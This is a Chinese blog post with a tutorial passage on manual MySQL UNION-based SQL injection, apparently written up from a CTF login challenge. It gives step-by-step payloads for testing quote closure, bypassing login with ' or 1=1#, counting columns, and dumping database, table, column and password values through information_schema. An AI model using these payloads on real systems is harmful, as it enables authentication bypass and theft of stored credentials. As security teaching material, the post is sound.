sql注入知识---联合注入

已于 2023-04-12 22:25:53 修改
阅读量172 收藏
点赞数
文章标签: sql 数据库 mysql
于 2023-04-12 08:00:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kui576/article/details/130083024
版权

MySQL手注之联合注入详解

一、问题(sql注入)的产生:

所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令

  • SQL注入原理:对用户输入过滤不严谨
  • SQL注入本质:违背了数据与代码分离的原则

二、基本的mysql数据库结构(有information表的)

为什么SQL注入看如下几个方面0.0​
information_schema数据库
​information_schema.tables 表 下的列table_name存放着表名信息
​information_schema.columns表下的列column_name存放着列名信息
​information_schema.schemata表下的列schema_name存放着数据库名信息​
table_schema 数据库名​
table_name 表名
​column_name 列名

三、union联合查询要执行后面的语句要前面语句查不到

  1. 参数类型 - 是否用闭合‘ “
  2. 数据库类型 - 数据库的语法(注入方式的不同)
  3. 数据提交方式 - 数据的注入传输不同 提交和接受方式不同
  4. 数据SQL查询方式 - 功能 1.无回显 2.测试点不一样 3.人工发现 工具一般发现不了
  5. 数据是否加密编码等 - 注入payload必须也相同形式发送
  6. 数据是否存在回显等注入权限是否高权限 - 权限不同操作不同(换一种方式获取网站权限)

四、注入详细步骤:

以下内容都是填在框中的,这里这么写只是为了方便表述。当然的,将#改成%23也行。

1.判断闭合方式:

username=1&password=123				//显示 NO,Wrong username password!!!
username=1'&password=123			//报错
username=1'#&password=123			//显示 NO,Wrong username password!!!
username=1' or 1=1#&password=123	//显示 Login Success!Hello admin!Your password is 'xxx'

2.开始尝试order by猜字段数

username=1' order by 4#&password=123	//显示 Unknown column '4' in 'order clause'
username=1' order by 3#&password=123	//显示 NO,Wrong username password,说明有3个字段

3.爆库

username=-1' union select 1,2,3#&password=123			//显示 Hello 2!Your password is '3',这里表明有2,3两个回显位
username=-1' union select 1,database(),3#&password=123	//得到库名“geek”

4.爆表

username=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()#&password=123	//得到表名“geekuser,l0ve1ysq1”

5.爆列

username=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='l0ve1ysq1'#&password=123	//得到列名“id,username,password”

6.爆字段

username=-1' union select 1,group_concat(password),3 from l0ve1ysq1#&password=123	//得到flag
kui954
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
Web安全:SQL注入联合注入原理+步骤+实战操作
wangyuxiang946的博客
05-08 738
联合注入原理解析,联合注入使用步骤
SQL注入系列篇之union联合注入
d59hao的博客
04-27 701
union注入攻击,通过union或union all连接,将自己写的SQL拼接到原始SQL中,从而达到执行任意SQL语句的效果。
SQL注入之路之一:联合注入
weixin_62715196的博客
08-10 608
简单介绍union联合注入的原理、常用数据库名,以及一次简单的手工联合注入流程
SQL联合注入
黑黑的小鸭的博客
08-09 2207
超详细介绍SQL联合注入,本文使用靶场为sqli-labs less-1;
SQL注入利用学习-Union联合注入
最新发布
qq_61861243的博客
04-08 1267
SQL语句中查询数据时,使用select 相关语句与where 条件子句筛选符合条件的记录。如果该id=1 中的1 是用户可以控制输入的部分时,就有可能存在SQL注入漏洞。数据库提供联合查询,使得可以将两条SQL查询语句的结果进行连接。务必注意:两者的字段数必须一致。判断联合查询语句中的字段数时,可以使用order by num。当依次增大num时,如果出现错误,那么上 一条SQL查询语句的结果字段数就为num-1。
【极客大挑战 2019】EasySQL
Lixunzhe0112的博客
01-17 386
admin ’ or 1=1 # + admin //之后又尝试了password后面也是可以进行注入的。尝试用admin+admin进行登陆给出:NO,Wrong username password!然后尝试在uasername后进行sql注入。登陆成功,并且给出了flag。
SQL注入天书 sqli-labs
01-11
在学习SQL注入的过程中,你需要掌握以下关键知识点: 1. **SQL语法**:理解基本的SQL语句结构,包括SELECT、INSERT、UPDATE、DELETE等操作,以及WHERE、AND、OR等逻辑运算符,这有助于识别和构造注入语句。 2. **...
sql注入讲解ppt.pptx
08-10
SQL 注入基础知识点总结 SQL 注入是指 web 应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在 web 应用程序中事先定义好的查询语句的结尾上添加额外的 SQL 语句,在管理员不知情的情况下实现非法...
sqli-labs实验指导手册
11-17
以下是对sqli-labs实验指导手册中涉及的SQL注入知识点的详细说明: 1. **字符型联合注入**(如less-1): - **注入点检测**:通过修改查询参数(如?id=1' and 1=1),观察页面响应变化来判断是否存在注入。 - **...
sql注入-0629-田靖宇-17130105521
08-08
以下是针对SQL注入攻击的一些关键知识点的详细解释: **一、UNION联合查询注入** 1. **注入点判断**:通过在查询参数中添加`' and 1=1`来检查是否存在注入漏洞,如果页面返回正常,说明可能存在注入。 2. **字段数...
适合DVWA和SQL-li-lab的PHPStudy、DVWA、SQL-li-labs
03-26
这个平台提供了多种类型的SQL注入场景,包括盲注、时间基注入联合查询注入等,帮助用户深入理解SQL注入的工作原理和防范方法。 使用这些工具,初学者可以学习到Web应用程序安全的基础知识,而专业人士则可以提升...
【BUUCTF】[极客大挑战 2019]LoveSQL1writeup
GZWZ_的博客
05-04 950
easysql
SQL注入知识总结
ma963852的博客
03-30 9724
目录 漏洞原理 漏洞危害 利用方式 手工注入 手工注入步骤-基于联合查询: 1、判断注入类型 ​2、查询字段数 3、判断回显位 4、查询数据库的基本信息 5、查询数据库中的数据 报错注入 xpath语法错误 ​ 无回显无报错 1,布尔盲注 2,时间盲注 3,带外注入 4,SQL注入命令执行一 4,SQL注入命令执行二 堆叠注入 HTTP头注入 宽字节注入 二次注入 自动化注入 SQLMAP sqlmap特性 输出的内容 设定目标 综...
SQL注入联合查询注入
热门推荐
selecthch的博客
06-07 4万+
联合查询注入利用的前提前提条件:页面上有显示位什么是显示位?在一个在一个网站的正常页面,服务端执行SQL语句查询数据库中的数据,客户端将数 据展示在页面中,这个展示数据的位置就叫显示位联合注入的过程1、判断注入点2、判断是整型还是字符型3、判断查询列数4、判断显示位5、获取所有数据库名6、获取数据库(test)所有表名7、获取(数据库:test,表:admin)中所有字段名8、获取字段中的数据一、...
一些常见的SQL注入方法(联合注入 盲注 延时注入 sqlmap的使用)
joke_ljh的博客
06-02 6748
一些常见的SQL注入方法 一.联合注入 判断是否有注入点 ’ and 1=1–+ 猜列数 'order by 1–+ 一直猜到5报错,列数为4 猜库 'and 1=1改为and 1=2 'and 1=2 union select 1,2,3,4–+发现标题为2,内容为3,把2,3换成sql语句 'and 1=2 union select 1,user(),database(),4–+ ’ and ...
sql注入-联合注入
tlucky的博客
04-10 717
1.第一关 (1)根据提示输入id (2)求闭合字符 使用单引号出现报错,说明闭合字符为单引号 (3)求字段数 为3时显示正常 ,字段数为3 (4)求回显字段 回显字段为2,3 (5)爆数据库名 (6)爆表名 (5)爆列名 (8)爆字段名 2. 第二关 (1)求闭合字符 可判断为数值型注入 (2)确定字段数 字段数为3 (3)确定回显数 回显位为2,3 (4)爆数据库名 (5)爆表名 (6)爆列名 (7)爆字段名 3. 第三关 (1)求注入类型 加)试一下,
SQL注入攻击详解
程序员世杰
03-03 8037
一、什么是SQL注入 SQL 注入SQLi)是一种注入攻击,,可以执行恶意 SQL 语句。它通过将任意 SQL 代码插入数据库查询,使攻击者能够完全控制 Web 应用程序后面的数据库服务器。攻击者可以使用 SQL 注入漏洞绕过应用程序安全措施;可以绕过网页或 Web 应用程序的身份验证和授权,并检索整个 SQL 数据库的内容;还可以使用 SQL 注入来添加,修改和删除数据库中的记录。 SQL 注...
mysql 联合查询注入
weixin_45842177的博客
01-07 133
练习1. 1. 2. 3. 4. dvwa sql注入 low mid high
sql注入攻击详解(二)sql注入过程详解
cuiyaoqiang的博客
06-11 3526
在上篇博客中我们分析了sql注入的原理,今天我们就来看一下sql注入的整体过程,也就是说如何进行sql注入,由于本人数据库和网络方面知识有限,此文章是对网上大量同类文章的分析与总结,其中有不少直接引用,参考文章太多,没有注意出处,请原作者见谅) SQL注入攻击的总体思路是:1.发现SQL注入位置; 2.判断后台数据库类型; 3.确定XP_CMDSHELL可执行情况 4.发现WEB虚拟目录 5
sqli-labs靶场练习笔记
11-09
14至24关:这些关卡继续深化SQL注入的各种技术和策略,包括更复杂的联合查询、信息获取、权限提升等。学习者会接触到`UNION SELECT`、`INFORMATION_SCHEMA`表的使用,以及如何利用注入进行数据库的深度探索。 sqli-...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

kui954

感谢各位的支持o(* ̄3 ̄)o

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值